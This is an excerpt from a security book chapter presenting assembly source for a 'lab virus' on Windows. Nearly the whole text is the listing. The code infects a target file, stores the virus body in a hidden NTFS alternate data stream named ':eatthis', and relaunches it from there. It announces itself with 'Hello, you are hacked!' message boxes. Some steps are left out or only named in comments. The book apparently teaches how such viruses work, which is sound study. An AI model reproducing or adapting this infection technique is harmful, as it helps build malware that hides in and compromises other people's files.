Source Code of a Lab Virus | Shellcoders Programming Uncovered (Uncovered series)

Natural languages practically never cope with the task of describing computer algorithms. They are too ambiguous and full of contradictions.

Provided in Listing 22.1 is the source code of the key fragment of the virus with comments. Technical details are omitted here. They are supplied on the companion CD-ROM of this book in the file named xcode.asm.

Listing 22.1: Source code of the key fragment of the lab virus

 section '.code' code readable executable start:         ; Delete the temporary file.         PUSH shutdown         CALL [DeleteFile]         ; Determine the name.         PUSH 1000         PUSH buf         PUSH 0         CALL [GetModuleFileName]         ; Read the command line.         ; The --* file name option - infect         CALL [GetCommandLine]         MOV  EBP, EAX         XOR  EBX, EBX         MOV  ECX, 202A2D2Dh ; rool:         CMP  [EAX], ECX                ; Is this "--*"?         JZ   infect         INC  EAX         CMP  [EAX], EBX                ; End  of  the command line?         JNZ  rool         ; Output the diagnostic message         ; confirming the virus's presence in the file.         PUSH 0         PUSH aInfected         PUSH aHello         PUSH 0         CALL [MessageBox]         ; Add the name of the NTFS stream to the file name.         MOV  ESI, code_name         MOV  EDI, buf         MOV  ECX, 100; code_name_end - code_name         XOR  EAX, EAX         REPNE SCASB         DEC  EDI         REP  MOVSB         ; Start the NTFS stream for execution.         PUSH xxx         PUSH xxx         PUSH EAX         PUSH EAX         PUSH EAX         PUSH EAX         PUSH EAX         PUSH EAX         PUSH EBP         PUSH buf         CALL [CreateProcess]         JMP go2exit                  ;Exit the virus. infect:         ; Set eax to the first character of the target file         ; (from now on, called the destination, or dst for short).         ADD  EAX,  4         XCHG EAX, EBP         XOR  EAX, EAX         INC  EAX         ; Check the dst for infection.         ; Rename dst as shutdown         PUSH shutdown         PUSH EBP         CALL [RenameFile]         ; Copy the main stream of dst into shutdown.         PUSH EAX         PUSH EBP         PUSH BUF         CALL [CopyFile]         ; Add the NTFS stream name to the new name.         MOV ESI, EBP         MOV EDI, buf copy_rool:         LODSB         STOSB         TEST AL, AL         JNZ copy_rool         MOV ESI, code_name         DEC EDI copy_rool2:         LODSB         STOSB         TEST AL, AL         JNZ copy_rool2         ; Copy shutdown into dst:eatthis.         PUSH EAX         PUSH buf         PUSH shutdown         CALL [CopyFile]         ; Length of correction of the file to be infected         ; Delete shutdown.         PUSH shutdown         CALL [DeleteFile]         ; Output the diagnostic message         ; confirming successful infection.         PUSH  0         PUSH  aInfected         PUSH  EBP         PUSH  0         CALL [MessageBox]         ; Exit the virus. go2exit:         PUSH 0         CALL [ExitProcess] section '.data' data readable writeable         shutdown   DB "shutdown", 0   ; Name of the temporary file         code_name  DB ":eatthis", 0   ; Name of the stream, in which         code_name_end:                ; the main body will be stored         ; Various text strings displayed by the virus         aInfected DB "infected",0         aHello    DB "Hello, you are hacked!"         ; Various buffers for auxiliary purposes         buf RB 1000         xxx RB 1000